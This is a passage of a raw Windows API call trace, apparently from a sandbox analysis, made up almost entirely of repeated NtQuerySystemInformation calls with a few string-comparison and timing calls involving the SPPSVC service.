ResultLength=0x0) [0284.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf60, Length=0x28, ResultLength=0x0) [0284.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce00, Length=0x20, ResultLength=0x0) [0284.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd80, Length=0x20, ResultLength=0x0) [0284.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd80, Length=0x20, ResultLength=0x0) [0284.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd80, Length=0x20, ResultLength=0x0) [0284.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d040, Length=0x38, ResultLength=0x0) [0284.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d040, Length=0x38, ResultLength=0x0) [0284.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cec0, Length=0x20, ResultLength=0x0) [0284.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce50, Length=0x20, ResultLength=0x0) [0284.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.119] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.119] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.119] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce50, Length=0x20, ResultLength=0x0) [0284.119] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.119] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d1b8, Length=0x50, ResultLength=0x0) [0284.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d130, Length=0x28, ResultLength=0x0) [0284.120] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0284.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d1b8, Length=0x50, ResultLength=0x0) [0284.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d1b8, Length=0x50, ResultLength=0x0) [0284.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d0a0, Length=0x50, ResultLength=0x0) [0284.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d020, Length=0x28, ResultLength=0x0) [0284.121] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0284.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d0a0, Length=0x50, ResultLength=0x0) [0284.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d0a0, Length=0x50, ResultLength=0x0) [0284.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d0a0, Length=0x50, ResultLength=0x0) [0284.122] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.122] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cfd0, Length=0x38, ResultLength=0x0) [0284.124] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.124] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce00, Length=0x28, ResultLength=0x0) [0284.124] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.124] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.125] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce00, Length=0x28, ResultLength=0x0) [0284.125] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.125] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.125] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce00, Length=0x28, ResultLength=0x0) [0284.125] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.125] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.125] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce70, Length=0x28, ResultLength=0x0) [0284.125] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.125] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.125] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cfd0, Length=0x38, ResultLength=0x0) [0284.126] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.126] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cef0, Length=0x28, ResultLength=0x0) [0284.130] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.130] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.131] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.131] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.131] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.131] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.131] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cef0, Length=0x28, ResultLength=0x0) [0284.131] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.131] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cfd0, Length=0x38, ResultLength=0x0) [0284.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce50, Length=0x20, ResultLength=0x0) [0284.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdd0, Length=0x20, ResultLength=0x0) [0284.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdd0, Length=0x20, ResultLength=0x0) [0284.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdd0, Length=0x20, ResultLength=0x0) [0284.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cfd0, Length=0x38, ResultLength=0x0) [0284.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce50, Length=0x20, ResultLength=0x0) [0284.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cde0, Length=0x20, ResultLength=0x0) [0284.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cde0, Length=0x20, ResultLength=0x0) [0284.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.134] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xa78207d100 | out: lpSystemTimeAsFileTime=0xa78207d100*(dwLowDateTime=0x36b0e996, dwHighDateTime=0x1d6666a)) [0284.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d1b8, Length=0x50, ResultLength=0x0) [0284.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d0f0, Length=0x28, ResultLength=0x0) [0284.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d008, Length=0x50, ResultLength=0x0) [0284.135] GetTickCount () returned 0x1187175 [0284.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ced8, Length=0x58, ResultLength=0x0) [0284.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdf0, Length=0x38, ResultLength=0x0) [0284.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc20, Length=0x28, ResultLength=0x0) [0284.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc20, Length=0x28, ResultLength=0x0) [0284.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc20, Length=0x28, ResultLength=0x0) [0284.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc20, Length=0x28, ResultLength=0x0) [0284.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc90, Length=0x28, ResultLength=0x0) [0284.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdf0, Length=0x38, ResultLength=0x0) [0284.140] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.140] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd10, Length=0x28, ResultLength=0x0) [0284.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd10, Length=0x28, ResultLength=0x0) [0284.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdf0, Length=0x38, ResultLength=0x0) [0284.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc70, Length=0x20, ResultLength=0x0) [0284.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbf0, Length=0x20, ResultLength=0x0) [0284.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbf0, Length=0x20, ResultLength=0x0) [0284.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbf0, Length=0x20, ResultLength=0x0) [0284.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdf0, Length=0x38, ResultLength=0x0) [0284.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc70, Length=0x20, ResultLength=0x0) [0284.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc00, Length=0x20, ResultLength=0x0) [0284.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc00, Length=0x20, ResultLength=0x0) [0284.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ced8, Length=0x58, ResultLength=0x0) [0284.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdb0, Length=0x38, ResultLength=0x0) [0284.150] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.150] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbf0, Length=0x28, ResultLength=0x0) [0284.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbf0, Length=0x28, ResultLength=0x0) [0284.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbf0, Length=0x28, ResultLength=0x0) [0284.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbf0, Length=0x28, ResultLength=0x0) [0284.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc60, Length=0x28, ResultLength=0x0) [0284.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdb0, Length=0x38, ResultLength=0x0) [0284.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdb0, Length=0x38, ResultLength=0x0) [0284.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cce0, Length=0x28, ResultLength=0x0) [0284.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cce0, Length=0x28, ResultLength=0x0) [0284.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdb0, Length=0x38, ResultLength=0x0) [0284.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdb0, Length=0x38, ResultLength=0x0) [0284.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb50, Length=0x20, ResultLength=0x0) [0284.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cad0, Length=0x20, ResultLength=0x0) [0284.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cad0, Length=0x20, ResultLength=0x0) [0284.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cad0, Length=0x20, ResultLength=0x0) [0284.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd20, Length=0x20, ResultLength=0x0) [0284.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdb0, Length=0x38, ResultLength=0x0) [0284.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc40, Length=0x20, ResultLength=0x0) [0284.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbc0, Length=0x20, ResultLength=0x0) [0284.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbc0, Length=0x20, ResultLength=0x0) [0284.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbc0, Length=0x20, ResultLength=0x0) [0284.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdb0, Length=0x38, ResultLength=0x0) [0284.163] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc40, Length=0x20, ResultLength=0x0) [0284.163] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbc0, Length=0x20, ResultLength=0x0) [0284.163] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.163] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbc0, Length=0x20, ResultLength=0x0) [0284.163] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.163] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbc0, Length=0x20, ResultLength=0x0) [0284.163] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.163] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.163] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.163] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.163] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdb0, Length=0x38, ResultLength=0x0) [0284.163] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc40, Length=0x20, ResultLength=0x0) [0284.163] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbd0, Length=0x20, ResultLength=0x0) [0284.163] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.164] NtQuerySystemInformation (SystemInformationClass=0xb9, 